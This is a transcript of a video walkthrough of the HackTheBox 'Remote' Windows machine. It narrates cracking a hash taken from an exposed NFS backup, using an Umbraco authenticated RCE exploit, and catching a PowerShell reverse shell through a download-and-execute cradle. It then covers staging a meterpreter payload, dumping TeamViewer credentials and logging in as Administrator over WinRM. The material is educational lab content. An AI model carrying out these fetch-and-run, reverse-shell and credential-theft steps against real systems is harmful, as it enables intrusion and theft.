HackTheBox - "Remote" - Umbraco & Windows

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everyone my name is john hammond and welcome back to their youtube video today we're looking at some hack the box showcasing the remote room that retires today it is an easy easy i guess medium no easy it's an easy windows box i'm just not that good because it's windows but i wanted to showcase this walk through it with you so here it is remote and we have an ip address to work against it's 10 10 10 180 we can fire up a command line and get to where the good stuff happens so i'm gonna head over to my hack the box folder and i'll make a directory for youtube remote and hop over there so we could start with some good practice actually create a little readme file um and i will just put in some classic notes hello this is me writing this on the day which is september 45th and here's the ip address of the machine let's start off with the classic rust scan i'll pipe this into a rustscan.log so to t that and we can see what we're up against okay some ports that are open we see port 21 for ftp port 80 for http one i think that's rpc bind uh i always get that maybe wrong or something 139 135 20 49 okay so maybe some network file share stuff five nine eight five that's odd and peculiar you don't see him all that often uh port 5985 what is that winrm winner m oh okay i mean it's windows that makes sense uh maybe nmap yeah ruskin will pass it over to nmap and we'll kind of get a better idea as to what all those things are um but since we have some things to poke at let me get started with some classic enumeration i'll do a little nikto on that guy t that to get an output file i'll do the same thing with some go buster http and i'll use a word list from the default word list that comes from durabuster alrighty now let's go check out the webpage welcome to acme allow me to introduce myself my name is wiley coyote genius i'm not selling anything nor am i working my way through college and check out our products okay awesome a couple of blog posts looks like all lorem ipsum text if i click on any of those do i get an idea of a username this page loads nope no no username more lorem ipsum and nonsense products is that a real ink yeah it is our gorgeous selection of unicorns ping pong balls and a jumpsuit okay nice crazy people great are these real lengths circuit beard oh yeah these are super cool great uh let me just click on the source here let me hit ctrl u and kind of see what it's built in in the html i see some html comments for navigation media links add links to categories a lot of that to do html comment read links to categories scripps umbreco or on bracket i always pronounce that wrong i don't know the best way to uh pronounce it but that's an indicator that umbreco might be on here and if you google what that is it is a cms or content management system if you haven't heard of it before uh i think i've kind of seen it a little bit in other capture flags or training exercises or activities let's see what dirtbuster go buster's got pretty much the same thing as previous and what we've already just seen through the web page nico get anything yet nope nmapscan is done let me try and subtle that rust scan log and that's going to have all the gross colors so if you wanted to you could less tack r that and that way you can see the colors there at least from your terminal but uh scrolling through it just to get a better idea of these ports okay we do have anonymous ftp we could potentially log in with that http yeah rpc bind stuff 2049 nfs network file share maybe there's something interesting in that and that's all it's got for me okay well if we have ftp i guess we could take a look at that 10 10 10 180 with my ftp client we did see from our nmap scan was that anonymous share anonymous access was enabled so username will be anonymous and password could just be empty you can whack enter there let's see what we have nothing okay and we can't go any farther than that or explore anything else so that's not helpful fantastic what else did we have we had port 80 which we're looking at and we had the nfs share i don't see anything else other than that intranet that they're going on and we didn't actually poke at that intranet page is there anything over there still mentioning umbraco in the css here i'm breco someone's going to give me flack someone's going to someone's going to hate on me for not knowing how to pronounce that does anyone know how to pronounce that that's the same sort of thing you're like how do you pronounce reader to ridare rad air i don't know red r jiff gif starting the holy wars here if umbraco is a thing is that a location that like it's a content management system like the same thing like wordpress might be so maybe there's a page for that in my cursory uh research on it just for the showcase content management system publishing world wide web content written c sharp deployed on microsoft stuff that tracks with me because we're looking at this on a windows machine just doing some quick learning reading to see documentation can be found there it's open source are there any like default locations that it adds oh where's all this build what is this guy quick tutorials creating a basic site oh goodness can i just get to content when you hit your localhost address or whatever you're setting up you should see welcome to the umbraco installation screen and then log into your ubranco racco cms installation on slash umbreco in your browser is that a thing go buster hasn't found that yet neato hasn't found that maybe we could try some other stuff or like add it into our word list but if i just simply try to go to umbraco or umbreco oh i have a login happy funky friday fantastic a username is usually your email and password so i can't just try like a classic admin admin or like a stupid stupid little sql injection will that get me anywhere dude does that reflect out what i have in there can i do like some cross-site scripting hello please sub that's a better one that's a better one to throw in here please sub slap that in yeah okay whatever okay we know though that there is a login here and we could do some other enumeration because there are still some other ports that we haven't looked at yet taking a look at this we know we have 21 was a dead end 80 was the web page obviously and 2049 nfs or network file share so if you guys aren't familiar with uh mounting and looking at machines that have nfs shares typically you can start with just a show mount command and tac e will uh show them out what does the tacky actually do oh if you like kind of the colors that i'm using within uh batch excuse me within bash uh in my linux command line i'm using batman or bat some of the shell extensions that come with the bat package tech e and exports will show the nfs servers export list so the same way that i'm looking at like cat if i cat out my readme it has kind of nice color stuff so if you're interested go ahead and take a look at that anyway show mount tak e on our server here 10 10 10 180 and they have a site backups that everyone could access ooh could i try and mount that i'm gonna make a temporary directory that just matches the same thing oh with a incredible typo dope make directory backups and i already have one of those so [Music] i'll recreate it for the sake of video uh and and then let's go ahead and try and mount to it so you can mount tacti nfs so mount specifying the type network file share and then what you actually want to mount so you're going to specify the share with the ip address and a colon and then you can just specify the share that you're actually looking for so in this case it's site backups as we got that from show mount and then you need the location as to where you're actually going to put it so i'll put it in that temporary directory site backups that i created and you do need root privileges to do that so whack a little pseudo on there and there we go okay let's hop over there to site backups and we got a lot of stuff ooh umbraco client braco i'm just gonna like permutate all the potential possibilities of me saying that and let's run like a find on here to see like everything that's in here and i'll put it in my location where i'm working on this i'll put in my notes like uh nfslisting.txt see what we get or anything is find not gonna like buffer that or showcase that for me oh no now there's stuff happening what do we got in here so what we could do is we could kind of trim this down open it in like sublime text or an editor and just kind of like remove the things that we know that we don't care about that could kind of help us look for interesting things and prune for the potentially peculiar stuff that we might be able to find some valuable and juicy information with because a lot of the stuff like okay google maps pictures we probably don't care about um same thing with like i don't know views oh when there is some of the binary stuff for on breakout config files will probably be useful for us because maybe there's some more information as to how this thing is actually being put together yeah css files though we don't need to care about media files images and there's a ton of assets and fonts in umbreco that we probably don't care about blah blah blah javascript files angular yeah okay a lot more javascript tiny mce for some code editing settings views settings aspx files so this is i guess my process for like at least getting a quick snapshot of everything that's in there obviously fine will return a ton of stuff but you can kind of narrow this down and prune it down and look for interesting things if you wanted to oh whoops i accidentally like pasted whatever i was searching there is a web.config and that is usually something worthwhile to look at so let me go ahead and cat out that web dot config and bat is giving us the nice uh color coded output and there is a lot of configuration stuff for umbraco and umbraco um image processor config umbreco settings config we could save that maybe took a take a look at that one if we wanted to what else do we have in here app settings connection strings yeah is this thing going to use it like a database umbraco db database dsn whoa what just happened why did it bring me to the top of the file did i lose that did i just lose what i was looking at there we go broncodb dsn what is that dsn connection string with instance of a brecco dsn so that's definitely the database yeah yeah okay and that might be where it normally stores like a database and password so since we're looking at hack the box right there's no other box that it's going to like reach out and connect here this isn't going to be a full-blown network it's going to data source data directory umbraco.sdf is it a local file or storing the database what is this umbraco sdf thing you can see some of my previous research is it just like a local database sdf file spatial data file is a single user geodatabase file format developed by autodesk i don't know if that's i don't know if that's the same thing i'm looking at standard database format that sounds a little bit more like what i'm looking at do i have that file these are variables data source data directory i think i guess i can just look for this umbreco sdf so let me find and grep for that guy see what i have here please get a hit please please please okay app data on bracket sdf if i file that guy what is it going to tell me data incredible fantastic that's super duper useful um just strings it dude let's see if we get anything interesting in that oh yeah okay oh this file is ginormous oh and these are all like the blog posts and ooh the products nice crazy people heck yeah let me let me less this see we got oh right at the top administrator admin default en user or us some guid guide guid administrator admin and that looks like a hash yeah and then it specifies hash algorithm sha one whoa okay and that's repeated a little bit so this looks like a potential hash we could slap this in our readme nfs share found uh app data umbraco.sdf can i crack that hash it's a shot one hash uh crack station yeah yeah like crack hash online please and that's totally the definition of crack station slap that in there fail at a captcha bacon and cheese fantastic for the admin user right and that had that had his email in here it's uh admin being his username and admin http.local looks like an email address so can i log in with that bacon and cheese ooh nice yeah yeah okay logged in what can i do with this media settings developer developer does that let me do anything wait is there any like is there anything that like already does this if i search sploit form bracko am i going to find anything remote code execution with metasploit metasploit is that a thing that will work oh wait authenticated remote code execution is just as easily what's that guy nito didn't find anything else so let's use metasploit to search for that see if it works upload aspx will that do it what do i gotta know it doesn't need like a username though that's kind of weird to me well let's just do it i'm going to set my l host to my adapter and then i'll just set the r host to 10 10 10 and 180 and just fire the thing off execution failed okay whatever what was that other one there was a there was a search ploy other one that i saw um goodness goodness large terminal size make sure you guys can see this thing search exploit tac m this guy um yeah i'll just bring to the current directory yeah yeah yeah for this thing i'm brought to remote code execution by authenticated administrators that's me login password host is just for getting a uh closing quotation that's funny so we have admin hdb.local and we have bacon and cheese and our host is 10 10 10 180. we'll just just do it what is it going to do launch the attack what what code does it run am i going to get like command execution execute a calc for the poc i don't really want that can i like ping myself what's my ip address just to see if this thing would work ipadr yeah that's me slap in my address and let's stop go buster because you don't really need to do that and then let's sudo can i tcp dump like attack l i ton zero and then look for icmp yeah i need to specify sudo for that that's fine so i just want to get like a proof of concept to see if this thing will actually execute that code so let me python three that four thing guy oh that needs to have the http schema it looks like yeah how about now did it do it or did i do something wrong um okay that's fine whatever i guess we will put that away we'll search blight one last time to see what that last thing was seo checker plug-in oh it's just cross-site scripting no no let's do a simple umbraco exploit search oh no raj has one authenticated remote code execution that is the exact same thing that we just saw this one looks good umbraco authenticated rce oh and you can just pass stuff right through it so that'd be really easy specify commands what does this thing do some advisories on a packet storm a little bit more robust uh script here some arg parse this looks like a modified and better version of the thing that we were just looking at so the payload is using some xml and xsl to invoke a process oh yeah it's just running c sharp through it okay let's try that guy it's a git repository so i'm gonna go ahead and get clone this and let's try to head over there and run this exploit i need the username so attack you admin http.local password was bacon and cheese uh ip address 10 10 10 180 and then the c for the commander run i'll just do like a simple who am i your proof of concept oh that also needs the http prefix you can tell kind of just by that python air like we're missing the schema see if that gets anything it does okay so can i do that ping one more time just kind of like verify uh i'm 14 27 is that right oh what is that doing why did that fail did that fail unrecognized arguments oh the help says i need to specify tack a to note to note some args okay so let's fire that off and there's the ping awesome awesome awesome okay so now what we have code execution right uh we should probably like take note of this simple thing in our in our in our notes here let's see if we can get a reverse shell this is a windows box right i could probably run like system info yeah and all this output is coming through that's awesome windows box x64 processor it's good to know the architecture so can i get a reverse shell um on windows you might need to do a little bit more clever things because it's not as easy as just running bash if you want to do a powershell reverse shell nashang is pretty awesome to do that nishang is a framework in collecting scripts and payloads which enables the use of powershell for offensive security pen testing and red teaming there is a power shell reverse shell that this thing has and that is in the shells folder here and there's an invoke powershell tcp.ps1 it is pretty decent powershell code with a lot of actual description and documentation as to what the heck the thing is doing there's an example syntax here so we could work with that if you don't have that downloaded you can get clone it you can work with it i am going to copy that from my op directory it's in shells and then i have that invoke powershell tcp.ps1 i'll put that here and then i'll modify that script there's no like good i don't think there's like a power shell display or color scheme and sublime text which is annoying but we have this example here so what this is gonna essentially allow us to do and wow that's just really hard to look at can i cap that does bat know how to work with that thing yeah okay good so at the end of all this all this puts together is building out the functionality to use that syntax like you would be able to run this and it would create all these functions that you could use or bind these commandlets for you uh so what we want to do is at the very very end actually execute this so we could just stage this thing to fire off the reverse shell as we need to i know my ip address was 10 10 14 27 and the port number quad 4 is totally fine to work with so let's set up a little web server python tac m http dot server let that go and we have our invoke powershell tcp in the same directory as we're starting the web server so i could start my netcat listener to get ready for this thing and then i can try and fumble with the syntax of actually getting this thing to start so tax c will let me work with a command so let's run powershell and then we have tack a to pass in arguments i'll make this a little bit easier to read so i could simply be like echo like hello or please sub just to get a proof of concept that i'm running powershell oh and i need to be in that correct directory where that exploit script actually is so okay we get that output good sanity check now i want to run iex or invoke expression so i would be able to run commands from a string so if i were to try and do that once again echo please sub following the iex this echo is going to come out into kind of standard output and then iex will just execute please sub as if it were a command in this case obviously there is no command please sub so that tells me that that syntax might work so now i'll go ahead and create a new object and this is going to allow me to do some windows stuff powershell stuff to get a web client object which has the function download string and that way i could give it my ip address 10 10 10 14 27 on that port 8000 and download and run because of this iex all that string is going to be pulled in and then executed invoke powershell tcp.ps1 so ideally we'll see this web server see the request for that invoke powershell tcp the victim and target will run that code and then over on the other side here i'll see my reverse shell come through so if i whack the enter button hopefully we'll get some magic and we do now i am on that box awesome awesome awesome so i can do a little who am i and looks like i am this weird iis user that's fine let me go to the root of the directory root of the file system here and let's see if i could snag that user flag let me check public there it is i can run cat because i'm in powershell so there is that user flag and i can't easily clear my screen so we'll just pretend you didn't see that who cares next we'll want to try to do some enumeration and potentially priv-esque do our privilege escalation so a really good way to do this is to run win peas or some of the privilege escalation awesome scripts i'll just search for win peas and carlos paula i think i'm butchering pronunciation as always so forgive me awesome windows preference escalation tools for windows and linux so you've seen me run lindp's probably all the time on linux stuff but win peas is also really good to work with they have a batch script rendition of it uh and i've seen that fumble for me i don't know if it's because it's just slow to return or just didn't execute but uh the exe file is kind of really what we would love to work with uh if i actually go into this here you know there's a solution file for like actually getting the the source code and stuff for working with it within visual studio and compiling the thing but they do offer under bin in this path here they also offer releases and an x86 x64 or x86 release so you literally have the executable file you could download and work with i've tried to click on this and like download it raw and then i've had my browser yell at me because chrome would be like hey this is dangerous or firefox would be like hey this but this file is potentially malicious with that in mind um this reverse shell that we did trying to run that invoke powershell tcp might get triggered by windows defender sometimes i mean most often if that sort of thing is on right so you might not always be able to do this specific thing in our hack the box learning environment we can totally do that i'm just going to go ahead and download this with curl i guess so i will copy that link address and i will close my silly meterpreter session because i don't need that anymore and let's get back to my hack the box youtube remote file folder here let me go ahead and download this so i'll w get winps.exe or you probably already have that repository clone and you can just move it in here note that this is the 64-bit version i pulled that one down specifically because we saw in our system info command that's the same architecture for this victim that's just kind of a good thing to do i think the 32-bit one you can usually trust but uh anyway we've got that so now i actually want to download this file so i'm going to go back into my reverse shell of the victim and actually let me mark that as black so you kind of know there's some distinction here uh i'll move into a temporary directory i'll move into c windows temp and there's some stuff in here now but i don't particularly care about it it actually probably has some of my remnants of previously working on it so let's kill those uh yeah yeah yeah removing the fourth wall let's let's try and pull this down into this box we still have our http web server running so we could transfer files just as easily earlier we did this download string i think there's a download file one as well but you also just have the kind of classic powershell invoke web request and my face is going to be in the way and i can't clear the screen so let me make that go away invoke web request to download from my ip address 10 10 10 14 27 port 8000 win ps.exe i can pull this down but it kind of doesn't know what to do with it so the best thing for us to do is actually bring that to a file and you can pass that with that invoke web request tac out file argument so http 1427 win ps and i'll specify that tac out file location and i'll just call it like winps.exe keep the file name here good that's downloaded now if i ls i should have this file here fantastic so we could simply run this if we were in cmd.exe uh you wouldn't need to specify the dot slash since we are in powershell we should to be able to run that out of the current directory so while whack that windpeas.exe give that just a second and hopefully hopefully hopefully it will come back with something and it did okay fantastic what do we got here you could of course do this manual enumeration if you really wanted to oh that also isn't giving me a full like scroll back dislike uh could i download this i'm trying to think of a decent way to be able to pull this back down to the victim you know what i think a good thing to do would actually just be get an interpreter shell in here because that would just kind of make kind of our our control a little bit easier so i like to just use some of the interpreter cheat sheets or msf venom to be able to craft that and create that netsec has a really really good one that i always reference because it helps me not think and it just will give me the quick and easy payload i know it's easy a windows meter to reverse tcp but i always fumble with like the architecture and whether or not i need to specify that so i will steal this command and i'll get back to my sublime text just so i can kind of uh have a window to tinker with this command my ip address needs to be filled in here 14 27 and we'll listen on i guess quad 6. here we go and we'll call this like meterpreter.exe good good good whack that out that will go ahead and create a prepackaged binary and download like actual program that we can run put on the host put on the victim and then have it call back to our own interpreter shell so let me msf consult this guy so i can prepare the handler like the listener that'll be able to catch this reverse shell and then we still have our http server running down here i'll use exploit multi handler and i will show options as insanely check the things that i need to change we do need to set our l host to ourselves we do need to set our l port to our port that we wanted to listen on and we should set the payload to the same thing that we told msf venom to use so i will set payload to that guy and now i can run and start up that listener so back over in our victim because we have just that simple meterpreter.exe file ready to download in the same directory what i'll do is i'll once again use that invoke web request to download this guy invoke web request my ip and save that to a file i'll just call it met.exe good kind of zooming out here i do have this met.exe good so my meterpreter shell should be all set and ready to catch that so if i were to dot slash met you can see that meterpreter session one opened up on the top here fantastic now i can upload and download things a little bit easily and that might be convenient for actually checking out the rest of that uh win peace enumeration script let me go ahead and check out my current directory i'm still in the temporary file so i will actually use this shell to be able to run windpease.exe one more time and i'll save it to like winout.log and hopefully when i get my prompt back that will behave for me good now i can download that winout.log because that's in the current directory and meterpreter is the one that has that download command i wouldn't be able to kind of easily do that on the victim without being able to like spin up an http server or netcat or file transfer so my interpreter just kind of makes that nice and easy for me so now let me go ahead and let's tack r that win out file yep that's totally fine yes do i actually have content in that oh boy did it just do it it did just do it does that not want to work can i cat when out.log okay sure that works just fine for me and bat will handle it now i can actually read through all the stuff that the win piece gave me uh it would probably have just been smarter and better to have an actual scroll back on here or use tmux or a better thing that will help me actually view the output of but that was just some quick problem solving to be able to see the rest of this and it's good to have them interpreter on there oh windows vault search power by watson looks like this has a lot of stuff that could potentially be vulnerable for user environment variables computer name is remote username is remote system environment variable stuff we've seen before lsa protection no av was detected that's probably why we were able to totally run uh meterpreter and a reverse shell normally you wouldn't see that happen on a windows target powershell stuff drives information current token privileges maybe we could tinker with some of those se impersonate privilege ooh would that be an option some auto login credentials were found oh just the default username for administrator okay nothing huge interesting processes yep there's powershell i invoked that met.exe i invoked that that's arm interpreter win peas i invoked that okay all the interesting stuff seemingly is just me services information interesting services non-microsoft uh open ssh teamviewer oh whoa and that's just running oh come on i don't need less i don't need your help i was just looking at teamviewer and it moved away from me i can search for it again team viewer here we go so if we did our actual like own manual enumeration like if we went over to cdc and the c drive you could probably hop over to like the program files and see if there's anything that sticks out to you any particular programs or software that might be installed don't forget to take a look in the other program files directory program files x86 slap that guy in there and you should see teamviewer so that's kind of interesting and peculiar not something that's installed by default right not native to windows so maybe a thought considering this box is called remote and teamviewer is supposed to be a remote access and availability thing uh tool and program and software i wonder if there are any logs or any information for that team viewer application we could hop over there and start to explore things if we really wanted to we could deep dive into it but because we have them interpreter on here because we have metasploit running and i don't have a ton of shame i don't have any issue with running metasploit uh maybe there's a module that will be able to search and look for teamviewer credentials so teamviewer metasploit there is a windows gatherer teamviewer passwords seemingly module this module will find and decrypt stored teamviewer passwords incredible so arma turbo session let's go ahead and hit back or background on that so we get back to our regular msf or msf console shell and then let's search for that team viewer and see looks like we do have a post module post windows gather credentials teamviewer passwords let's check that out so i'll use that and show options to see what we got to supply here we do need the session for what we're actually working with and if we were to check out our sessions we have our one session of interpreter here on the victim so let me set session to just one and then fire that off immediately it finds this unattended password for remote awesome and i spent a decent amount of time now trying to figure out like okay how do i connect to teamviewer uh with this unattended setup can i just connect to it as an ip address and and and do things with it i didn't really get anywhere with that uh and then i eventually just kind of thought like well this is a password right and potential password reuse is a thing so maybe this would be someone else's password but i didn't see any other users on this box other than really just the administrator himself and then i kind of put some of the puzzle pieces together we saw in our rust scan output or from our nmap searching that we actually have winrm on here that port that we saw earlier so maybe i could try this password for that administrator user so i could save this if i wanted to slap it in or read me but let's go ahead and try to use evil winrm to connect to it if you aren't familiar with evo10rm or you haven't seen it before you can totally go download it it's the winrm shell that you could use for hacking and penetration testing typically it's just good to get access on a box if you see that windows remote management or winram on a target on windows pretty simple need stack i for an ip address and a user and password you could pass along it can also do some pass the hash stuff which is very very cool and i want to get smarter on this i need to learn and tinker with it a little bit more but let's go ahead and do it let's use evo1rm on that ip address with the user being administrator and with the password being tacp and i'm going to have to specify single quotes here because these exclamation points might make bash choke or wine so let's whack that and it connected so we are currently in the administrator's documents and we are the administrator so we could check out what we have here over in his desktop dir looks like we have that root dot text uh can i run wc tech l will powershell know what that means no get um or like measure object i think i can actually cure uh clear this screen so that's handy measure optic root.txt does that work we could just cap the thing out but that is uh seriously now i just kind of want to know measure object powershell i am earning powershell i guess i would have to cat it out yeah so catroot.text and then pipe it to measure object you can't just pass it the file name incredible can i get the line please how about characters character or car character 32 characters so we know it's a hash and i'm not spoiling anything by showcasing the root.text when i've already showcased the user.txt anyway that's that that is the remote box uh this was a lot of fun for me because it's windows and i need to stretch myself and do more windows boxes and windows machines um i have a lot to learn there and it's all about the learning process so this has been kind of fun i know it's an easy box and that's how it's kind of rated but that's still something that i enjoy and have a good time with and there's always some kind of cool tools and things to learn working with that so holy cow i hope you enjoyed this video uh we did some really nifty stuff doing some i don't know umbraco looking for things enumerating in ntfs shares or nfs shares sorry um mounting those and exploring those and pillaging even with simple strings and okay then using some code execution uh to get access to the box pulling in some win ps to do enumeration and finding passwords with teamviewer metasploit so there's a lot of a lot of stuff going on but wow thanks so much for watching everybody i really hope you enjoyed this video if you did please do do the youtube algorithm things i would love to see maybe a quick like in the video a silly comment down at the bottom i don't care uh youtube algorithm stuff please subscribe thanks so much for watching everybody i'll see you in the next video take care love you [Music] with

Info

Channel: John Hammond

Views: 77,446

Rating: undefined out of 5

Keywords:

Id: sskmyuVnSps

Channel Id: undefined

Length: 48min 22sec (2902 seconds)

Published: Sat Sep 05 2020